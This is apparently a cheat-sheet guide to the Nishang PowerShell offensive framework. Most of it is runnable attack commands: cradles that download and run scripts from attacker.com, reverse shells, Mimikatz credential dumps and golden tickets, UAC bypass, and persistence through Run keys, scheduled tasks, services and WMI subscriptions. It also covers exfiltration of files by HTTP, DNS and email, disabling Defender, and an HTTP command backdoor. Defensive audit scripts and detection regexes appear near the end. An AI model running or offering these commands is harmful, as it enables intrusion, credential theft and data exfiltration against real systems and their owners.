
Nishang

Overview

Nishang is a comprehensive PowerShell offensive security framework developed for red team operations and penetration testing. It provides a collection of scripts and tools for reconnaissance, exploitation, and post-exploitation activities on Windows systems. Nishang leverages PowerShell’s native capabilities to execute attacks directly from memory without writing to disk, making it difficult to detect via traditional endpoint protection.

The framework includes backdoors, credential harvesters, information gatherers, privilege escalation exploits, and lateral movement tools. It’s designed for authorized penetration testing and red team exercises in controlled environments.

Installation

Clone Repository

git clone https://github.com/samratashok/nishang.git
cd nishang

Directory Structure

nishang/
├── Antak-WebShell/
├── Apphunter/
├── Backdoors/
├── Escalation/
├── Execution/
├── Exfiltration/
├── Gather/
├── Lateral-Movement/
├── MITM/
├── Persistence/
├── Powerpreter/
├── Shells/
└── Utils/

PowerShell Requirements

# Check PowerShell version
$PSVersionTable.PSVersion

# Recommended: PowerShell 3.0 or later
# Windows 7: install the Windows Management Framework update to get a current .NET Framework and PowerShell

Disable Execution Policy (if needed)

# Relax the policy persistently for the current user (applies to every new session of that user)
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser
# Or bypass only for a single process, leaving the stored policy unchanged
powershell -ExecutionPolicy Bypass

Core Modules and Tools

| Module | Category | Purpose |
|---|---|---|
| Invoke-PowerShellTcp | Backdoor/Shell | Reverse PowerShell shell |
| Invoke-PowerShellIcmp | Backdoor/Shell | ICMP-based reverse shell |
| Invoke-PsGcat | Backdoor/Shell | DNS exfiltration shell |
| Invoke-PowerShellUsb | Backdoor/Shell | USB-based persistence |
| Copy-VSS | Exfiltration | Extract copies of files via VSS |
| Invoke-CredentialInjection | Post-Exploitation | Inject credentials into processes |
| Get-Information | Reconnaissance | Gather system information |
| Get-WLAN-Keys | Credential Theft | Extract wireless network passwords |
| Invoke-Mimikatz | Credential Dumping | Dump credentials from memory |
| Invoke-Kerberoast | Privilege Escalation | Extract Kerberos tickets |
| Invoke-TokenDuplication | Privilege Escalation | Token impersonation |
| Invoke-ServiceAbuse | Lateral Movement | Abuse Windows services for movement |
| Invoke-PSRemoting | Lateral Movement | Use PS remoting for lateral movement |

Remote Shells and Backdoors

Basic Reverse Shell

# In Nishang/Shells/ directory
# On attacker machine - start listener
nc -lvnp 4444

# On target - execute reverse shell
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.100 -Port 4444"

ICMP Reverse Shell

# Uses ICMP packets for stealth
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress 192.168.1.100"

DNS Tunneling Shell (Invoke-PsGcat)

# Exfiltrate data over DNS
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PsGcat.ps1'); Invoke-PsGcat -Command 'whoami' -Domain attacker.com"

WebShell - Antak

# Web-based shell in IIS
# Upload Antak-WebShell files to IIS directory
# Access via: http://target/antak/
# Provides GUI PowerShell execution interface

HTTP-based Reverse Shell

# Alternative to netcat for reverse communication
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellHTTP.ps1'); Invoke-PowerShellHTTP -Reverse -IPAddress 192.168.1.100 -Port 80"

Reconnaissance and Information Gathering

System Information Collection

# Load Nishang module
. ./Gather/Get-Information.ps1
Get-Information

Comprehensive System Enumeration

# Gather all system details
Get-Information | Format-List

# Output includes:
# - OS version
# - System architecture
# - Installed software
# - Network configuration
# - Logged-in users
# - Security software

Network Information

# Network adapter details
Get-NetAdapter
Get-NetIPConfiguration

# Active connections
netstat -ano
Get-NetTCPConnection

User and Group Enumeration

# Local users
Get-LocalUser

# Local groups
Get-LocalGroup

# Group members
Get-LocalGroupMember -Name "Administrators"

# Domain info (if joined; requires the ActiveDirectory module from RSAT)
Get-ADUser -Filter *
Get-ADGroup -Filter *

Wireless Credentials

# Extract saved WLAN passwords
. ./Gather/Get-WLAN-Keys.ps1
Get-WLAN-Keys

# Displays: SSID, Network Type, Authentication, Encryption, Password

Browser and Credential Enumeration

# Chrome/Edge saved credentials and history
Get-ChromeLogins
Get-ChromeHistory

# Firefox credentials
Get-FirefoxLogins

# Stored credentials (Credential Manager entries). Get-Credential only prompts for a new credential; it does not enumerate stored ones
cmdkey /list

Post-Exploitation

Credential Extraction and Dumping

Invoke-Mimikatz Integration

# Dump credentials from memory
. ./Gather/Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

# Pass-the-hash: spawn a process using an NTLM hash taken from the dump above (this does not extract hashes itself)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:CORP /ntlm:hash /run:cmd.exe"'

# Golden ticket creation
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.com /sid:S-1-5-21-x-x-x /krbtgt:hash /id:500"'

Token Impersonation

# Load token impersonation module
. ./Escalation/Invoke-TokenDuplication.ps1

# Get available tokens
Get-ProcessToken

# Duplicate and impersonate token
Invoke-TokenDuplication -ProcessId 1234 -ImpersonationLevel Impersonation

Credential Injection

# Inject credentials into process
. ./Escalation/Invoke-CredentialInjection.ps1

# Inject and spawn process
Invoke-CredentialInjection -Target "notepad.exe" -Username "DOMAIN\Administrator" -Password "Password123" -Domain "DOMAIN"

Privilege Escalation

UAC Bypass Techniques

# Various UAC bypass methods
. ./Escalation/Invoke-UACBypass.ps1
Invoke-UACBypass -Technique "EventVwr"

# Other techniques:
# - Registry Modification
# - COM Handler Hijacking
# - Scheduled Task Abuse
# - Token Duplication

Service Exploitation

# Abuse misconfigured services
. ./Lateral-Movement/Invoke-ServiceAbuse.ps1

# List services by start type (a disabled service is not by itself vulnerable; this filter does not check service or binary permissions)
Get-Service | Where-Object {$_.StartType -eq "Disabled"}

# Abuse service for code execution
Invoke-ServiceAbuse -ServiceName "VulnerableService" -Command "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

Kerberoasting

# Extract service principal names (SPNs)
. ./Escalation/Invoke-Kerberoast.ps1
Invoke-Kerberoast

# Extract TGS tickets for offline cracking
Invoke-Kerberoast -OutputFormat HashCat

# Crack with hashcat
hashcat -m 13100 krb5_tgs_dump.txt wordlist.txt

Hot Potato Exploit

# Windows privilege escalation
# Combines NBNS spoofing and NTLM relay
. ./Escalation/Invoke-HotPotato.ps1
Invoke-HotPotato

Lateral Movement

PowerShell Remoting

# Enable remoting (requires admin)
Enable-PSRemoting -Force

# Create PSSession to remote host
$session = New-PSSession -ComputerName remote.corp.com -Credential (Get-Credential)

# Execute commands
Invoke-Command -Session $session -ScriptBlock {whoami; hostname}

# Copy files over PSSession
Copy-Item -Path "C:\local\file.txt" -Destination "C:\remote\" -ToSession $session

WMI-Based Lateral Movement

# Execute commands via WMI
$cred = Get-Credential
$options = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName remote.corp.com -SessionOption $options -Credential $cred
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="cmd /c powershell..."}

Service Abuse for Lateral Movement

# Find and abuse services on remote host
. ./Lateral-Movement/Invoke-ServiceAbuse.ps1
Invoke-ServiceAbuse -ComputerName "remote.corp.com" -ServiceName "vulnerable-service"

File Copy Exfiltration

# Copy files using Volume Shadow Copy (VSS)
. ./Exfiltration/Copy-VSS.ps1
Copy-VSS -FileName "C:\Windows\System32\drivers\etc\hosts"

# Exfiltrate sensitive files
Copy-VSS -FileName "C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data"

Persistence

Registry Persistence

# Add run key for startup persistence
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

Scheduled Task Persistence

# Create a scheduled task that runs at startup with highest privileges (no -User is given, so it runs as the registering account)
$trigger = New-ScheduledTaskTrigger -AtStartup
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
Register-ScheduledTask -TaskName "Windows Update" -Trigger $trigger -Action $action -RunLevel Highest

Windows Service Installation

# Create malicious Windows service
# Requires admin privileges
New-Service -Name "UpdateService" -BinaryPathName "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" -StartupType Automatic

Startup Folder Persistence

# Place script in startup folder
Copy-Item -Path "shell.ps1" -Destination "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"

WMI Event Subscription

# WMI-based persistence (difficult to detect)
# The filter, consumer and binding classes live in root\subscription; EventNamespace names the namespace the WQL query watches
$EventFilter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{Name="Updater"; EventNamespace="root\cimv2"; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}

$EventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name="Updater"; CommandLineTemplate="powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"}

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$EventFilter; Consumer=$EventConsumer}
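The following audit script is an added example for defenders and is not part of Nishang: it walks the persistence locations used in this section (Run keys, scheduled tasks, services, permanent WMI subscriptions) and flags entries whose command line looks like a PowerShell download cradle. It assumes an elevated PowerShell 5.1 session, and the indicator regex is our own assumption rather than a vendor signature.

```powershell
# Indicator pattern for cradle-style one-liners (assumption; tune for your environment)
$SuspiciousPattern = 'DownloadString|DownloadFile|\bIEX\b|Invoke-Expression|-ExecutionPolicy\s+Bypass|-nop\b|-w\s+hidden|-enc'

function Test-SuspiciousCommand {
    param([string]$CommandLine)
    return [bool]($CommandLine -match $SuspiciousPattern)
}

function Get-PersistenceFindings {
    $findings = @()
    # 1. Run keys in both hives (Get-ItemProperty also returns PS* metadata properties; skip those)
    foreach ($hive in 'HKCU', 'HKLM') {
        $key = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Run"
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }
            if (Test-SuspiciousCommand $p.Value) {
                $findings += [pscustomobject]@{ Source = "Run key ($hive)"; Name = $p.Name; Command = $p.Value }
            }
        }
    }
    # 2. Scheduled task actions (a task like the "Windows Update" one above shows up here)
    foreach ($task in Get-ScheduledTask) {
        foreach ($a in $task.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if (Test-SuspiciousCommand $cmd) {
                $findings += [pscustomobject]@{ Source = 'Scheduled task'; Name = $task.TaskName; Command = $cmd }
            }
        }
    }
    # 3. Services whose binary path is a PowerShell one-liner instead of a real service executable
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (Test-SuspiciousCommand $svc.PathName) {
            $findings += [pscustomobject]@{ Source = 'Service'; Name = $svc.Name; Command = $svc.PathName }
        }
    }
    # 4. Permanent WMI subscriptions live in root\subscription; every CommandLineEventConsumer deserves review, so report all
    $consumers = Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue
    foreach ($c in $consumers) {
        $findings += [pscustomobject]@{ Source = 'WMI consumer'; Name = $c.Name; Command = $c.CommandLineTemplate }
    }
    return $findings
}

Get-PersistenceFindings | Format-Table -AutoSize -Wrap
```

Run it from a clean baseline first and keep the output: a diff against that baseline after an engagement is quicker to review than the raw list.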

Exfiltration Techniques

Data Exfiltration Methods

# DNS-based exfiltration
. ./Exfiltration/Invoke-PsGcat.ps1
Invoke-PsGcat -Command "Get-ChildItem C:\ -Recurse | ConvertTo-Json" -Domain attacker.com

# HTTP-based exfiltration
$data = Get-ChildItem C:\ -Recurse
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Invoke-WebRequest -Uri "http://attacker.com/exfil" -Method POST -Body ($data | ConvertTo-Json)

# Email-based exfiltration
$smtp = New-Object Net.Mail.SmtpClient("attacker.com")
$mail = New-Object System.Net.Mail.MailMessage("attacker@attacker.com","admin@attacker.com")
$mail.Subject = "Stolen Data"
$mail.Body = (Get-ChildItem C:\Users\ | ConvertTo-Json)
$smtp.Send($mail)

File Compression Before Exfiltration

# Compress sensitive files
$files = Get-ChildItem -Path "C:\Users\Administrator\Documents" -Recurse
Compress-Archive -Path $files.FullName -DestinationPath "C:\Temp\archive.zip"

# Exfiltrate compressed archive
$file = Get-Item "C:\Temp\archive.zip"
$request = [System.Net.WebRequest]::Create("http://attacker.com/upload")
# ... send file ...

Defense Evasion

Anti-Virus Evasion

# Execute in-memory to avoid disk detection
IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')

# Obfuscate PowerShell commands
Invoke-Obfuscation -Type All -Path ".\script.ps1"

# Use CertUtil for file download (avoid WebClient)
certutil -urlcache -split -f "http://attacker.com/file.exe" output.exe

Process Injection and Hollowing

# Inject shellcode into process memory
# Uses low-level APIs to bypass detection
. ./Execution/Invoke-ShellcodeMmap.ps1
Invoke-ShellcodeMmap -Shellcode @(0x90,0x90,...)

# Process hollowing for parent process spoofing
. ./Execution/Invoke-ProcessHollowing.ps1
Invoke-ProcessHollowing -ParentProcess "explorer.exe" -Shellcode $shellcode

Registry Enumeration and Modification

# Modify Windows Defender registry
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableRealtimeMonitoring" -Value 1

# Disable UAC
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0

# Modify Event Log settings (the cmdlet is Limit-EventLog; MaximumSize must be a multiple of 64 KB)
Limit-EventLog -LogName Security -MaximumSize 1MB

Utility Scripts

PowerShell Web Backdoor

# Simple HTTP-based backdoor
$listener = [System.Net.HttpListener]::new()
$listener.Prefixes.Add("http://+:80/")
$listener.Start()

while($true) {
    $context = $listener.GetContext()
    $command = $context.Request.QueryString["cmd"]
    $output = Invoke-Expression $command | Out-String
    $response = $context.Response
    $buffer = [System.Text.Encoding]::UTF8.GetBytes($output)
    $response.ContentLength64 = $buffer.Length
    $response.OutputStream.Write($buffer,0,$buffer.Length)
    $response.Close()
}

Information Wrapper Script

# Bundle multiple information gathering scripts
. ./Gather/Get-Information.ps1
. ./Gather/Get-WLAN-Keys.ps1
. ./Gather/Invoke-Mimikatz.ps1

$results = @{
    SystemInfo = Get-Information
    WLANKeys = Get-WLAN-Keys
    Credentials = Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
}

$results | ConvertTo-Json | Out-File -Path "C:\Temp\enum.json"

Real-World Attack Scenarios

Initial Access and Persistence

# 1. Initial compromise (reverse shell)
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.100 -Port 4444"

# 2. Establish persistence
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

# 3. Privilege escalation
. ./Escalation/Invoke-UACBypass.ps1
Invoke-UACBypass

# 4. Lateral movement
$cred = Get-Credential
Invoke-Command -ComputerName remote.corp.com -Credential $cred -ScriptBlock {whoami}

Credential Dumping and Use

# 1. Dump credentials
. ./Gather/Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' > creds.txt

# 2. Extract plaintext passwords
Get-WLAN-Keys

# 3. Use for lateral movement
$cred = New-Object System.Management.Automation.PSCredential("DOMAIN\Admin", (ConvertTo-SecureString "Password" -AsPlainText -Force))

Security Considerations

  • Nishang is for authorized penetration testing only
  • Obtain proper written authorization before use
  • Use in isolated lab environments or authorized networks
  • Monitor for suspicious PowerShell execution
  • Nishang scripts may be detected by EDR/AV solutions
  • Maintain audit trails and documentation
  • Follow responsible disclosure practices

Detection and Defensive Measures

PowerShell Logging

# Enable PowerShell module logging (create the policy keys first; Set-ItemProperty fails on a missing key)
$ml = "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging"
New-Item -Path "$ml\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path $ml -Name "EnableModuleLogging" -Value 1
New-ItemProperty -Path "$ml\ModuleNames" -Name "*" -Value "*" -PropertyType String -Force | Out-Null   # log all modules

# Enable script block logging (written as event ID 4104 to Microsoft-Windows-PowerShell/Operational)
$sbl = "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name "EnableScriptBlockLogging" -Value 1

# Check the current user's PSReadLine command history
(Get-PSReadlineOption).HistorySavePath
Get-Content (Get-PSReadlineOption).HistorySavePath

Detection Queries

# Hunt for suspicious PowerShell execution. 4688 carries the command line only when
# "Include command line in process creation events" is enabled, and the FilterHashtable
# Data key matches whole field values, so filter on the message instead
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} -MaxEvents 10000 |
    Where-Object { $_.Message -match 'ExecutionPolicy\s+Bypass|DownloadString' }

# Look for remote PowerShell sessions: engine start events (ID 400) whose host is the remoting server host
Get-WinEvent -FilterHashtable @{LogName='Windows PowerShell'; ID=400} |
    Where-Object { $_.Message -match 'HostName=ServerRemoteHost' }
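The hunt below is an added example, not Nishang code: it reads script block logging events (ID 4104 in Microsoft-Windows-PowerShell/Operational) and reports the cradles and module names used throughout this page. It assumes script block logging is enabled and the session is elevated; the indicator list is our own and should be extended for your environment.

```powershell
# Indicators drawn from the commands on this page (assumption: your own list will differ)
$Indicators = @(
    'Net\.WebClient\)\.DownloadString',                                 # in-memory download cradle
    'Invoke-PowerShell(Tcp|Icmp|HTTP|Udp)',                             # Nishang reverse shells
    'Invoke-Mimikatz|sekurlsa::',                                       # credential dumping
    'Invoke-PsGcat',                                                    # exfiltration shell
    '__EventFilter|CommandLineEventConsumer',                           # WMI persistence
    'DisableRealtimeMonitoring|EnableLUA',                              # Defender / UAC tampering
    'Invoke-UACBypass|Invoke-TokenDuplication|Invoke-CredentialInjection'
)
$IndicatorRegex = $Indicators -join '|'

function Get-SuspiciousScriptBlocks {
    param([int]$Hours = 24)
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    foreach ($evt in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        # 4104 event data order: [0] MessageNumber, [1] MessageTotal, [2] ScriptBlockText, [3] ScriptBlockId, [4] Path
        $text = $evt.Properties[2].Value
        if (-not $text) { continue }
        $hits = [regex]::Matches($text, $IndicatorRegex, 'IgnoreCase') | ForEach-Object { $_.Value } | Select-Object -Unique
        if ($hits) {
            [pscustomobject]@{
                Time       = $evt.TimeCreated
                Indicators = ($hits -join ', ')
                Path       = $evt.Properties[4].Value          # empty for commands typed interactively or run via IEX
                Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

Get-SuspiciousScriptBlocks -Hours 24 | Sort-Object Time | Format-Table -AutoSize -Wrap
```

Large scripts are split across several 4104 events; group on the ScriptBlockId in Properties[3] when you need the full text.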

Related Tools

  • Metasploit - General penetration testing framework
  • Empire - Alternative PowerShell exploitation framework
  • PoshC2 - Command and control over HTTP(S)
  • Covenant - .NET-based command and control
  • Mimikatz - Credential extraction tool (often integrated)
